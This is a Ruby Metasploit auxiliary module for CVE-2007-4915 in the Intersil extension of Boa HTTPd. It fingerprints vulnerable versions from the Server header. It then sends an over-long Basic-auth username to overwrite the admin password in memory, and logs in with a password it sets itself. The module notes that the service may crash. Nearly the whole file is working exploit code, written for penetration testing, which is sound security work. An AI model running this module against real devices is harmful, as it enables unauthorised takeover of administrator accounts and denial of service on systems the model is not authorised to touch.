Path: blob/master/modules/auxiliary/admin/http/intersil_pass_reset.rb
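##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2007-4915 (Intersil extension of Boa HTTPd
# 0.93.x - 0.94.11). `check` fingerprints the target from its Server header;
# `run` sends the over-long Basic-auth username and then verifies whether the
# configured PASSWORD is accepted for "admin". Every request lands in the
# target's access log (IOC_IN_LOGS) and the service may go down
# (CRASH_SERVICE_DOWN), as declared in the Notes below.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Index of the character the version heuristic inspects: for a "0.9x"
  # version string this is the 'x' digit (e.g. '4' in '0.94').
  MINOR_DIGIT_INDEX = 3

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',
        'Description' => %q{
          The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11
          allows basic authentication bypass when the user string is greater
          than 127 bytes long. The long string causes the password to be
          overwritten in memory, which enables the attacker to reset the
          password. In addition, the malicious attempt also may cause a
          denial-of-service condition.

          Please note that you must set the request URI to the directory that
          requires basic authentication in order to work properly.
        },
        'Author' => [
          'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', # original discoverer
          'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', # original discoverer
          'Max Dietz <maxwell.r.dietz[at]gmail.com>' # metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2007-4915' ],
          [ 'BID', '25676'],
          [ 'PACKETSTORM', '59347']
        ],
        'DisclosureDate' => '2007-09-10',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The request URI', '/']),
        OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
      ]
    )
  end

  # Fingerprints the target from the Server header of a GET on "/".
  #
  # @return [Exploit::CheckCode] Vulnerable for a Boa 0.9x banner with x <= 4,
  #   Safe for other Boa builds, non-Boa banners, a missing Server header or a
  #   refused connection, Unknown when the version string is too short for the
  #   heuristic to be applied.
  def check
    res = send_request_cgi({
      'uri' => '/',
      'method' => 'GET'
    })

    # A response without a Server header used to raise NoMethodError on
    # nil.match; treat it like any other non-Boa banner.
    banner = res ? res.headers['Server'].to_s : ''
    match = banner.match(%r{Boa/(.*)})
    return Exploit::CheckCode::Safe('Not a Boa Server!') unless match

    version = match[1]
    vprint_status("Boa Version Detected: #{version}")
    # The heuristic reads version[0] and version[MINOR_DIGIT_INDEX]; a shorter
    # string previously crashed on nil.ord.
    return Exploit::CheckCode::Unknown("Unparseable Boa version: #{version}") if version.length <= MINOR_DIGIT_INDEX

    vulnerable_boa_version?(version) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
  rescue Rex::ConnectionRefused
    print_error('Connection refused by server.')
    Exploit::CheckCode::Safe
  end

  # Sends the 127-byte random username against TARGETURI, then re-requests the
  # same resource as "admin" with PASSWORD to see whether it is now accepted.
  # Aborts unless `check` reports Vulnerable or when a request gets no response.
  def run
    return if check != Exploit::CheckCode::Vulnerable

    uri = normalize_uri(target_uri.path)
    uri += '/' unless uri.end_with?('/')
    password = datastore['PASSWORD']

    res = send_request_cgi({
      'uri' => uri,
      'method' => 'GET',
      'authorization' => basic_auth(Rex::Text.rand_text_alpha(127), password)
    })

    if res.nil?
      print_error('The server may be down')
      return
    end

    # Only a 401 tells us the directory is actually protected by Basic auth.
    unless res.code == 401
      print_status("#{uri} does not have basic authentication enabled")
      return
    end

    print_status('Server still operational. Checking to see if password has been overwritten')
    res = send_request_cgi({
      'uri' => uri,
      'method' => 'GET',
      'authorization' => basic_auth('admin', password)
    })

    if res.nil?
      print_error('Server timed out, will not continue')
      return
    end

    case res.code
    when 200
      print_good("Password reset successful with admin:#{password}")
    when 401
      print_error('Access forbidden. The password reset attempt did not work')
    else
      print_status("Unexpected response: Code #{res.code} encountered")
    end
  end

  private

  # Character-level version heuristic kept from the original module: the major
  # digit must be '0' and the character at MINOR_DIGIT_INDEX must not exceed
  # '4' (i.e. 0.90 .. 0.94). Single-character string comparison is equivalent
  # to the former `.ord - 48` arithmetic for ASCII digits.
  #
  # @param version [String] text following "Boa/" in the Server header, at
  #   least MINOR_DIGIT_INDEX + 1 characters long
  # @return [Boolean] true when the banner matches the affected range
  def vulnerable_boa_version?(version)
    return false if version[0] > '0'                 # 1.x and later
    return false if version[MINOR_DIGIT_INDEX] > '4' # 0.95 and later

    true
  end
end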